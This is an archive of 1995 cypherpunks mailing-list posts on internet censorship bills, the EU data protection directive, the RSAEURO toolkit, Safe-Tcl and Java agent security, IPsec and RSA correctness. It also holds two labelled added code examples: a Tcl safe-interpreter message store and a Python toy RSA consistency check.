posted ACLU Online Analysis of the Cox/Wyden Bill.)

-----------------------------------------------------------
For the online community to take comfort in what is done in the final telco
bill in the conference committee, at a minimum the following must occur:

1.  The Senate's Exon/Coats amendment (the Communications Decency Act) must
be rejected -- that is, deleted from the bill, not merely modified in some
way.

2.  The House's Exon-like speech crimes amendment must be rejected -- that
is, deleted from the bill, not merely modified in some way.

3.  The ambiguities and problems in the Cox/Wyden amendment must be resolved
and then the Cox/Wyden amendment as modified should be included in the telco
bill.

The ACLU urges all those who care about free speech and personal privacy to
focus their energized efforts on all three fronts of the fight.
 
The ACLU will continue to fight all aspects of the cyber-censorship battle,
including the Exon-like speech crimes provisions just passed by the House,
the Exon/Coats amendment in the Senate, the Dole/Grassley anti-computer
pornography bill, the Grassley anti-electronic racketeering bill, and the
Feinstein anti-explosives information amendment to the counter-terrorism
bill.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 4 Aug 95 10:29:20 PDT
To: cypherpunks@toad.com
Subject: NIST/NCSSC National Information Systems Security Conference
Message-ID: <9508041729.AA04377@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



A couple of days ago I got a booklet about the 
"18th National Information Systems Security Conference 
(formerly the National Computer Security Conference) "
being held October 10-13 in Baltimore.  

Just a little excerpt about it:

One of the tracks is "The Internet and Beyond"
Several of the sessions look rather interesting.
The "Management and Administration" track includes 
at least two sessions by D. Denning of Georgetown Univ.
One of them is "Legalities: Will Encryption Keep Out Hackers"
and the other is "Critical Factors of Key Escrow Encryption 
Systems".  The first of those has a panel of S. Bellovin of AT&T,
M. Higgins of DISA, S. Kent of BBN, and E. Spafford of COAST.

So, is this a conference that is really worth something,
or something that the management heads might learn something at? ;-)

I guess that ordering my personal set of the Rainbow books
gets me on more lists than I thought :-)

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
http://spirit.aud.alcatel.com:8081/~droelke/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rsaeuro - General <rsaeuro@sourcery.demon.co.uk>
Date: Fri, 4 Aug 95 05:49:21 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCE:- RSAEURO Version 1.00
Message-ID: <12@sourcery.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


ANNOUNCE:- RSAEURO Version 1.00
===============================

What is RSAEURO?
----------------

RSAEURO is a cryptographic toolkit providing various functions for the use
of digital signatures, data encryption and supporting areas (PEM 
encoding, random number generation etc).  To aid compatibility with 
existing software, RSAEURO is call-compatible with RSADSI's "RSAREF(tm)" 
toolkit. RSAEURO allows non-US residents to make use of much of the 
cryptographic software previously only (legally) available in the US.

RSAEURO contains support for the following:

*    RSA encryption, decryption and key generation.  Compatible with 'RSA
     Laboratories' Public-Key Cryptography Standard (PKCS) #1.

*    Generation and verification of message digests using MD2, MD4, MD5 and
     SHS (SHS currently not implemented in higher-level functions to
     maintain compatibility with PKCS).

*    DES encryption and decryption using CBC (1, 2 or 3 keys using
     Encrypt-Decrypt-Encrypt) and DESX(tm), RSADSI's secure DES
     enhancement.

*    Diffie-Hellman key agreement as defined in PKCS #3.

*    PEM support for RFC 1421 encoded ASCII data with all main
     functions.

*    Key routines implemented in assembler for speed (80386 and 680x0
     currently supported).

International Use
-----------------

IMPORTANT NOTICE:  Please do not distribute or use this software in the
US - it is 'illegal' to use this toolkit in the US, as PKP have a patent 
to public-key cryptography.  If you are a US resident, please use the 
RSAREF toolkit instead.

Ftp Sites
---------

RSAEURO can be found at

ftp://ftp.dsi.unimi.it/pub/security/crypt/code
ftp://ftp.ox.ac.uk/pub/crypto/misc

Author Details
--------------

With comments and suggestions, please address them to Stephen Kapp, at
'rsaeuro@sourcery.demon.co.uk'

----------------------------------------------------------------------------
RSAEURO:      rsaeuro@sourcery.demon.co.uk
RSAEURO Bugs: rsaeuro-bugs@sourcery.demon.co.uk

RSAEURO - Copyright (c) J.S.A.Kapp 1994-1995.
All Trademarks Acknowledged.
----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 4 Aug 95 10:42:24 PDT
To: "Kari Laine" <buster@klaine.pp.fi>
Subject: Re: EU Data Protection
Message-ID: <199508041742.NAA21367@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:43 PM 8/4/95 +0002, Kari Laine wrote:

>Excuse me - what the f**k is this?  Does it bear some truth in it
>or is it just a bad joke? If it is not a joke where to get the damn
>text - thanks. Sorry for the language but this does  sound just
>the thing I have heard some rumours of and which certainly
>would result in banning strong crypto.


http://snyside.sunnyside.com/cpsr/privacy/privacy_international/international_laws/ec_data_protection_directive_1995.txt

Has the preliminary text.  The final won't be up for a while but won't be
that different.  Also try:

http://www.open.gov.uk/dpr/dprhome.htm

The UK Data Protection Registrar's home page.  They've been trying to
control electronically stored records since 1984.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 4 Aug 95 11:42:24 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: House Adopts Exon-Like Speech Crimes, Also Adopts Cox/Wyden , Amendment
In-Reply-To: <950804121746_47881732@aol.com>
Message-ID: <Pine.ULT.3.91.950804134123.7683B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 4 Aug 1995 ACLUNATL@aol.com wrote:

> At 9:10 am today, the House of Representatives voted to adopt an omnibus
> "Managers Amendment" to the telecommunications bill (HR 1555), which included
> new Exon-like speech crimes that would censor the Internet.   At 11:58 am,
> the House of Representatives voted 420 to 4 to adopt the Cox/Wyden amendment
> to the telco bill.  The Cox/Wyden amendment, however, was not designed to --
> and does not -- affect the Exon-like speech crimes provisions added to the
> telco bill by the House.

420 to 4 eh?  Was Newt one of those people that voted against it since he 
publicly came out as opposed to it?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMCJOBjokqlyVGmCFAQGSCAP/V4MoKB8U5IwR4yBOEjx12SyE/K0gsnqU
YnPcwt4yiaGvj8gcw5LY8PsuN+VKMldq1OZbQxyKxCERacvuYV8+iCPKszCOJAcq
LHcnuuNbm2j/5zFRHtX6T6IgL6j7uqaZ2IUhyLIF3nCqeFrHyLwQJaHhmezq1Hkz
DViNw9qqjpY=
=TQvO
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Fri, 4 Aug 95 12:17:07 PDT
To: rah@shipwright.com
Subject: PRA_fix
In-Reply-To: <v02120d01ac47c6952bb7@[199.0.65.105]>
Message-ID: <199508041911.AA13305@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   X-Sender: rah@tiac.net

   >   8-4-95. NYPaper:
   >
   >
   >   "A Contract Is Awarded To Improve Navigation."
   [snip]
   >      The geosynchronous satellite would radio a correction
   >      factor back to planes in flight, or any other user. The
   >      plane would also receive signals from the G.P.S.
   >      satellites, calculate a position, apply the correction
   >      factor and fix its location.

   This is called an active location system, and it was originally designed by
   G.K. O'Neill (The Princeton Physics Prof., Space Studies Institute founder,
   the guy who came up with all those spiffy space-settlement ideas in the
   late seventies -- see Babylon 5 for a picture ;-) -- and the inventor of
   the mass driver, among other things), under the name of Geostar, in the
   early 1980's. Its accuracy was supposed to be 6 inches in 2 dimensions,
   and 6 feet in 3 dimensions.  The FAA didn't like it because they didn't
   invent it, the DOD hated it because they wanted to commercialize GPS and
   they didn't want anything so accurate for civilian purposes. 

Actually, I (and probably others, but I don't want to argue from the
"it is widely believed" position) feel fairly sure that the government
commercialized GPS in order to put Geostar out of business, because there's
nothing for putting a company out of business quite like the government
saying they'll spend thirty billion dollars giving the same thing away
for free.

It's interesting that they're mentioning the ATC application: O'Neill
was a private pilot and came up with the Geostar idea initially as an
improvement to the current air traffic control system.

The whole thing would have cost less than either GPS or the planned
upgrades to the current ATC system, but the government is willing to
pay an order of magnitude (or more) worth of money to get a system
they can control.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 4 Aug 95 11:12:25 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Java and Safe-TCL security
In-Reply-To: <199508041701.KAA10421@jobe.shell.portal.com>
Message-ID: <199508041812.OAA23036@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The safe-tcl mailing list has not been active for a few months.  I think
> a lot of interest has transferred to Java.  One problem is that safe-tcl
> was oriented around email, so it lacks facilities for accessing web
> pages.
> 
> I agree with Ray that the security of safe-tcl leaves something to be
> desired.  I implemented a safe-tcl mail filter which would automatically
> run incoming mail scripts which were in safe-tcl format.  This would be a
> generalization of a remailer, so that users could write scripts which
> would determine when the remailing would occur, etc.  However I ran into
> a number of problems, particularly related to persistent storage (e.g.
> disk file access).  This is a hard problem for a "safe" system to solve.

Hal,
  One of the designs I have on the drawing board is to store per-script 
persistent data in a dbm file, and allow scripts to import/export data
from/to a shared tuple-space. I would limit the data storage to 1024
bytes (to make it portable, some DBM libraries have this limit)
  Scripts could store variables via a new command added to the interpreter
like 'SafeTcl_putvar varname value', and access valuables with
'SafeTcl_getvar varname', 'SafeTcl_varlist'. Also, there would be a
'SafeTcl_read_variables' which could be executed at the beginning of
the script to reload all stored variables. 
  Scripts could talk to other scripts by means of a 

	SafeTcl_export -value value scriptname1 scriptname2 ...
 
  The other script(s) could check for any incoming imports and use 
SafeTcl_import to retrieve the value. (when the last import is done,
the data is garbage collected. Also, there would be a timestamp so that
old data would be purged after a time limit anyway)


   An example might be, a calendar application in your mailbox which maintains
your weekly schedule. An incoming message script (agent), could "export"
some data to this calendar script which would correspond to some command.
For instance, asking if you would like to have dinner at a certain time.
If the calendar agent says yes, it could send a reply agent to inform
your calendar. 

  The calendar could be programmed to wakeup every so often and check for
imports, or the interpreter could just be made to "wakeup" any script
that got an import immediately. 

  Telescript's checkpointing of execution state is of course, much cleaner.
Too bad they don't know how to market a programming language.

  If anyone writes an enabled-mail java runtime, the same things could be
done a lot easier. 

  The problem with all safe "agent" designs is that the programming language
itself isn't enough. There needs to be a meta-agent language for 
querying capabilities of local environments.

-Ray
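
The export/import exchange proposed above can be sketched with stock Tcl safe interpreters and aliases. This is an added example, not code from Safe-Tcl or from the design's author; the `tuplespace` namespace, the pending-item cap and the one-hour lifetime are assumptions, while the 1024-byte limit and the `SafeTcl_export` / `SafeTcl_import` names come from the message.

```tcl
# Added illustration: stock Tcl safe interpreters, not Safe-Tcl code.
namespace eval tuplespace {
    variable maxBytes   1024   ;# the per-value limit proposed in the message
    variable maxPending 16     ;# assumed cap on unread items per recipient
    variable ttl        3600   ;# assumed lifetime of unread items, in seconds
    variable box               ;# box(recipient) -> list of {sender value stamp}
    array set box {}
    variable name              ;# name(interp) -> script name, set by the master
    array set name {}
}

# Create a restricted interpreter for a script. The script's name is assigned
# here by the master, so a script cannot claim to be some other sender.
proc tuplespace::attach {scriptName} {
    variable name
    set i [interp create -safe]
    set name($i) $scriptName
    interp alias $i SafeTcl_export {} ::tuplespace::export $i
    interp alias $i SafeTcl_import {} ::tuplespace::import $i
    return $i
}

# Drop unread items older than the lifetime, so stale data cannot pile up.
proc tuplespace::purge {{now ""}} {
    variable box; variable ttl
    if {$now eq ""} { set now [clock seconds] }
    foreach to [array names box] {
        set keep {}
        foreach item $box($to) {
            if {$now - [lindex $item 2] <= $ttl} { lappend keep $item }
        }
        if {[llength $keep]} { set box($to) $keep } else { unset box($to) }
    }
}

# SafeTcl_export -value value scriptname1 scriptname2 ...
proc tuplespace::export {interp args} {
    variable box; variable name; variable maxBytes; variable maxPending
    if {[llength $args] < 3 || [lindex $args 0] ne "-value"} {
        return -code error "usage: SafeTcl_export -value value scriptname ?scriptname ...?"
    }
    set value [lindex $args 1]
    if {[string length [encoding convertto utf-8 $value]] > $maxBytes} {
        return -code error "value exceeds $maxBytes bytes"
    }
    purge
    set recipients [lrange $args 2 end]
    foreach to $recipients {
        if {[info exists box($to)] && [llength $box($to)] >= $maxPending} {
            return -code error "too many unread items for $to"
        }
    }
    set stamp [clock seconds]
    foreach to $recipients {
        lappend box($to) [list $name($interp) $value $stamp]
    }
    return
}

# SafeTcl_import: return {sender value} pairs addressed to the calling script
# and discard them, so data is collected once it has been read.
proc tuplespace::import {interp} {
    variable box; variable name
    purge
    set me $name($interp)
    if {![info exists box($me)]} { return {} }
    set out {}
    foreach item $box($me) { lappend out [lrange $item 0 1] }
    unset box($me)
    return $out
}

# Constructed exchange: an incoming agent asks the calendar script a question.
set invite   [tuplespace::attach invite-agent]
set calendar [tuplespace::attach calendar]
interp eval $invite {SafeTcl_export -value {dinner Fri 19:00?} calendar}
puts "first import:  [interp eval $calendar {SafeTcl_import}]"
puts "second import: [interp eval $calendar {SafeTcl_import}]"

# An unread item is purged once it is older than the lifetime.
interp eval $invite {SafeTcl_export -value {lunch Mon?} calendar}
tuplespace::purge [expr {[clock seconds] + 7200}]
puts "after expiry:  [interp eval $calendar {SafeTcl_import}]"
```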
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 4 Aug 95 11:20:20 PDT
To: cypherpunks@toad.com
Subject: IPng6, SWIPE, ssh, etc.
Message-ID: <m0seRLR-0009yuC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


I would like some summary opinions of the state of various efforts to
enable full IP encryption.  I'm looking for progress reports and hints
as to which technologies are the closest to being implementable.

After playing with ssh, I've been thinking of what it would take to
start migrating certain links to full encryption, possibly using a
VPN-like arrangement.

I'm interested in hacking Linux, loopback userspace drivers for other Unix's,
and thinking about what would need to be done for MS-BLECH.  Of course,
firewall like conversion of IP<->IPng6 would be great.

Of course now that Linux has IP aliasing, IP masquerading (partial I think),
ipfw, and IP over IP tunneling, it has much of what it needs.  I'm just
considering development and migration paths.


I haven't kept up on IPng6 docs, so succinct pointers would be helpful.

One interesting tack might be to start running a dual IPng6/IP stack
where it learns to tunnel packets over a well-known IP udp/tcp link
if an address doesn't respond to IPng6.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 4 Aug 95 11:40:35 PDT
To: frissell@panix.com (Duncan Frissell)
Subject: Re: EU Data Protection
In-Reply-To: <199508041742.NAA21367@panix.com>
Message-ID: <199508041840.OAA01729@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Just more evidence for why even "well meaning" policywonks are dangerous.
Take for instance the rule that "data must be kept up to date and accurate"
How up to date and what is accuracy? So if I have a commercial web page
which records transactions on my server, and I stop logging and keep
year old records, do some statistic processing on them, I am in
violation for having stale data. 
  And what the hell is "accurate" data? All information about other people is 
subjective. I should be entitled to record any statistics about you for my 
use that I want. Just by interacting with me you transmit information. If
I interact with you and get the "wrong impression" about what type of
person you are, am I in violation for storing inaccurate data? (e.g. if
I write in my computerized diary "I think John Smith is a jerk.")
  How will this law affect reputation servers? If my reputation server
has what you consider a bad review of you, am I in violation?

  Privacy should be implemented via cryptography, not obscure political
machines which are doomed to fail and produce a black market for 
personal data anyway.

-Ray
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 4 Aug 95 07:46:45 PDT
To: liberty@gate.net
Subject: RE:NRC Panel, Law Enforcement questions
Message-ID: <9508041309.AA20627@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


Hello Jim,

I apologize that I didn't answer immediately. I have subscribed to
several mailing lists and sometimes get some hundred mails a day.
I don't have the time to read everything and therefore I have to
select. I didn't read this thread, but I found it in my archives.

> I wonder, and perhaps my kind friend Hadmut can help me here, if there is
> an English translation of any and all Nazi-era German laws/regs regarding 
> cryptography. As I [dimly] recall, Enigma was born as a private enterprise
> and the patent was only later taken over by government and classified after
> it was offered for sale to businesses (without much luck). These laws, if
> they exist, might make for interesting reading in side-by-side comparison 
> with either Sen. Grassley's latest proposals, or with anything regarding 
> cryptography coming from our paranoid FBI director.


I fear I have to disappoint you. :-(

First of all I don't know of any English translation of such laws.
The only English translation of law I know about is the translation of our
current basic law. It might be easier to find English translations
in English or American libraries than in German libraries.

Second, I don't know whether they had a certain law about cryptography.
AFAIK Enigma was a commercial product first and was taken over by the
government. But I don't know the way they did.

Third, there was no need to have laws. I don't want to restart the
discussion, but the Nazis didn't understand laws as so important. I have
read a book about their justice some time ago. The 'idea' and the
'public feeling' was seen as more important than laws. 


But perhaps another telecommunication law may be interesting. It was
forbidden to receive foreign radio senders. If they came into the
house and the radio was tuned to foreign frequencies, you got into
serious trouble. I just don't know where to find the text of the law.

regards
Hadmut








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 4 Aug 95 12:21:15 PDT
To: cypherpunks@toad.com
Subject: Re: PC E-cash (NewsClip)
Message-ID: <v02120d01ac481ff41b9f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Secret Service Says Student Used PC To Print Money

etc.

This reminds me of something which happened to me last week in a Burger King in Chelsea(MA), where the skipper now keeps the boat I grind winches on. I'm paying for my lunch and the cashier takes out a felt-tip pen and puts a little mark on my $10 bill.  She tells me that if the pen-stroke turns yellow instead of the black one she got with mine, the bill is counterfeit.  She told me she got a yellow mark on a $10 bill once. Go figure.

So now, we have a working minimum competitive cost of on-line digital cash verification. The amortized cost of the ink it takes to verify a piece of paper cash. What? 20 cents worth of ink? .002 cents?

More fun with numbers, 
Bob Hettinga

P.S. We just put in 12 volt power for the Mac. I also bought an inverter. 
     Banana daiquiris on the hook. Raise the cocktail flag!


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Fri, 4 Aug 95 01:03:23 PDT
To: Alex Tang <altitude@cic.net>
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <199508040455.AAA18486@petrified.cic.net>
Message-ID: <Pine.LNX.3.91.950804145626.10023E@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Aug 1995, Alex Tang wrote:

> 
> just wondering but...What are the intrinsic points of weakness?  

Perry Metzger and Mark Chen have recently expressed some criticism, and
Adam Shostack, around the end of May, posted a review that highlighted a 
number of potential problem areas.

Personally, I especially dislike the use of RC4-40 (yes, other algorithms 
are supported, but not using the export version of Netscape Navigator); 
the excessively large portion of the handshaking data exchanged as 
cleartext; and the limitations in certificate management (no provisions 
for verifying the revocation status with a CA).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 4 Aug 95 07:20:07 PDT
To: tcmay@sensemedia.net
Subject: Re: RSA has been proved correct
Message-ID: <9508041418.AA21187@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Mmmh,

correctness does not mean "it's a nice thing". It just
means that something fulfills the specs.

Do you know which specs were fed into the prover?

The specs could be as weak as

  -  RSA must terminate if fed with the number 42

  -  x ^ (e * d) = x  mod n   for all x from 0..(n-1)


Hadmut
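
Added example (not part of the original message): an exhaustive check of the second spec listed above on toy moduli, showing which keys satisfy it. The primes, exponents and function names are constructed for illustration and are far too small for real use.

```python
"""Which toy RSA keys satisfy  x^(e*d) = x mod n  for all x in 0..n-1 ?"""
from math import gcd


def first_counterexample(n, e, d):
    """Smallest x in 0..n-1 with x^(e*d) != x (mod n), or None if the spec holds."""
    for x in range(n):
        if pow(x, e * d, n) != x:
            return x
    return None


def satisfies_spec(n, e, d):
    """True if the spec holds for every x in 0..n-1 (checked exhaustively)."""
    return first_counterexample(n, e, d) is None


def make_key(p, q, e):
    """Textbook RSA key from two distinct primes; returns (n, e, d)."""
    n = p * q
    lam = (p - 1) * (q - 1) // gcd(p - 1, q - 1)  # lcm(p-1, q-1)
    return n, e, pow(e, -1, lam)                  # d = e^-1 mod lcm(p-1, q-1)


def encrypt(x, e, n):
    """Textbook RSA encryption, no padding."""
    return pow(x, e, n)


# Constructed toy parameters.
TEXTBOOK = make_key(61, 53, 17)   # n = 3233, d = 413
IDENTITY = (3233, 1, 1)           # e = d = 1: ciphertext equals plaintext
WRONG_D = (3233, 17, 412)         # private exponent off by one
NOT_SQUAREFREE = (9, 5, 5)        # n = 3^2, e*d = 25 = 1 mod phi(9) = 6


def survey():
    """Map each named key to (spec holds?, first counterexample)."""
    keys = {
        "textbook": TEXTBOOK,
        "identity": IDENTITY,
        "wrong_d": WRONG_D,
        "not_squarefree": NOT_SQUAREFREE,
    }
    return {name: (satisfies_spec(*k), first_counterexample(*k))
            for name, k in keys.items()}


if __name__ == "__main__":
    for name, (holds, witness) in survey().items():
        print(f"{name:15s} spec holds: {holds!s:5s} counterexample: {witness}")
    # The identity key passes the spec although it hides nothing.
    print("identity key, encrypt(1234) =", encrypt(1234, IDENTITY[1], IDENTITY[0]))
```

The key with e = d = 1 passes the same check as the textbook key, so a proof of this property alone says nothing about confidentiality.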


  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 4 Aug 95 16:37:13 PDT
To: cypherpunks@toad.com
Subject: Re: Java and Safe-TCL security
Message-ID: <199508042336.QAA15267@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Ray Cromwell <rjc@clark.net>
> Hal,
>   One of the designs I have on the drawing board is to store per-script 
> persistent data in a dbm file, and allow scripts to import/export data
> from/to a shared tuple-space. I would limit the data storage to 1024
> bytes (to make it portable, some DBM libraries have this limit)
>   Scripts could store variables via a new command added to the interpreter
> like 'SafeTcl_putvar varname value', and access valuables with
> 'SafeTcl_getvar varname', 'SafeTcl_varlist'. Also, there would be a
> 'SafeTcl_read_variables' which could be executed at the beginning of
> the script to reload all stored variables. 
>   Scripts could talk to other scripts by means of a 
> 
> 	SafeTcl_export -value value scriptname1 scriptname2 ...
>  
>   The other script(s) could check for any incoming imports and use 
> SafeTcl_import to retrieve the value. (when the last import is done,
> the data is garbage collected. Also, there would be a timestamp so that
> old data would be purged after a time limit anyway)

This sounds like an interesting approach.  I hear that Telescript uses a
remote procedure call concept for inter-script communication.  So one
script gets to call the public methods of another script.  I don't know
how it finds out what other scripts are around for it to talk to,
though, or decides whether they have anything of interest.

The tuple space idea sounds good and is not too dissimilar from the
get/setconfigdata in safe-tcl.  There are some problems about security
though.  Who gets to delete tuples?  How do you prevent a malicious
script from messing up the data?  Maybe it depends on the application,
what you want to use this data for.

BTW what kinds of facilities are there in Java for scripts to have access
to disk files?  I know there was some discussion of using scripts for
cryptography.  Presumably the user would want to give "read only" access
to the (public) keys he used.

And how about other forms of I/O, email and the like?  Can Java scripts
do this?  What are the restrictions to prevent abuse?  Safe-tcl has a
concept where a script can send mail, but the implementation pops up a
window and asks the user first if it is OK to send.  (Unfortunately that
doesn't work for a telescript like application where there is no user
around to vet the messages.)

>   The problem with all safe "agent" designs is that the programming language
> itself isn't enough. There needs to be a meta-agent language for 
> querying capabilities of local environments.

Yes, there was some discussion about this on the safe-tcl list.  There is
also an agents list I was on for a while but they couldn't even agree
about what an agent was so not much progress happened there!  There have
been various proposals for standard ways agent scripts could specify what
capabilities they need to run, etc.  Doing web searches on "agents" will
track a lot of these down.  However most seem concerned with traditional
issues like compute cycles, memory usage, etc., and not with the more
difficult and important issues of knowing whether there is another agent
there (or a local database) which has the specific information my agent
is after.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kari Laine" <buster@klaine.pp.fi>
Date: Fri, 4 Aug 95 10:23:52 PDT
To: cypherpunks@toad.com
Subject: Re: EU Data Protection
Message-ID: <199508041723.AA07790@personal.eunet.fi>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 03 Aug 1995 13:25:25 -0400
> To:            cypherpunks@toad.com
> From:          Duncan Frissell <frissell@panix.com>
> Subject:       EU Data Protection

> Could I bother the members of this list with a request that anyone who has a
> copy of (this week's or a recent) Computerworld, look and see if I'm quoted
> in an article by Mitch Betts on the European Union's humorous decree on
> Euro-wide data protection.  I was interviewed last Thursday.  The decree
> (July 24th) threatens to cut off data flows to any nation that doesn't adopt
> Eurosclerotic data protection standards.  

Excuse me - what the f**k is this?  Does it bear some truth in it
or is it just a bad joke? If it is not a joke where to get the damn
text - thanks. Sorry for the language but this does  sound just
the thing I have heard some rumours of and which certainly
would result in banning strong crypto.

Regards
Kari


Kari Laine          buster@klaine.pp.fi
LAN Vision Oy       Tel. +358-0-502 1947
Sinikalliontie 14   Fax  +358-0-524 149
02630 ESPOO         BBS  +358-0-502 1576/1456
FINLAND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 4 Aug 95 14:14:33 PDT
To: perry@piermont.com
Subject: Re:  Java and Safe-TCL security (was Re: Java, Netscape, OpenDoc, and Babel)
Message-ID: <9508042112.AA24506@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>the interpreter is made "safe" is to take a fully working tcl interpreter
>(with full privileges) at run time, and use TclDeleteCommand() to remove
>offending commands. Safe-TCL is not emasculated at compile time, but at
>run time.

I have been told by folks at Sun that they are planning on doing it at
compile-time as well as at run-time.  One of the concerns I conveyed
was that I want to make it easy to "pull out" the safe code and give
it a security audit.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 4 Aug 95 14:17:27 PDT
To: owner-cypherpunks@toad.com
Subject: Re:  Java and Safe-TCL security
Message-ID: <9508042117.AA24546@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>One problem is that safe-tcl
>was oriented around email, so it lacks facilities for accessing web
>pages.

No, it's just that the people who took it over^H^H^H^Hand ran with it
were most interested in email.  My initial motivation was that I wanted
to write a new news server that clients could download programs to.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Fri, 4 Aug 95 14:38:53 PDT
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: IPng6, SWIPE, ssh, etc.
In-Reply-To: <m0seRLR-0009yuC@sdwsys>
Message-ID: <199508042138.RAA05009@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Stephen D. Williams writes:
> I would like some summary opinions of the state of various efforts to
> enable full IP encryption.  I'm looking for progress reports and hints
> as to which technologies are the closest to being implementable.

The implementation efforts are in full swing. At the last IETF meeting
in Stockholm, Steve Crocker challenged the community to have IPSEC in
place and available in time for the Dallas meeting in December. There
is now a mailing list for those actively working on the implementation
efforts and a good deal of effort is being expended. In fact, I took
off this month more or less so that I could work full time on
implementation.

> I haven't kept up on IPng6 docs, so succinct pointers would be helpful.

The actual RFCs were submitted to the RFC editor over the last day or
so, so there should be real RFCs to quote shortly. However, for the
moment, check out draft-ietf-ipsec-* in the nearest internet-drafts
depository. ds.internic.net:/internet-drafts/ is probably a reasonable
spot.

> One interesting tack might be to start running a dual IPng6/IP stack
> where it learns to tunnel packets over a well-known IP udp/tcp link
> if an address doesn't respond to IPng6.

You don't need to use IPv6 for the security, by the way -- it's defined
to work on either. If you want, of course, I'm sure the v6 folks would
love a Linux v6 stack to show up soon...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Fri, 4 Aug 95 15:48:23 PDT
To: rjc@clark.net
Subject: Java and Safe-TCL security (was Re: Java, Netscape, OpenDoc, and Babel)
In-Reply-To: <199508042152.RAA12471@clark.net>
Message-ID: <199508042243.AA08602@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Ray Cromwell <rjc@clark.net>
   Date: Fri, 4 Aug 1995 17:52:24 -0400 (EDT)

     SafeTcl or Java? I wish SafeTcl was isolated into a separate library
   with compiled-in safety so I could embed it into my applications. As it is
   now, I have to just use normal Tcl and hack in the MakeInterpreterSafe()
   function which removes dangerous commands.

   -Ray

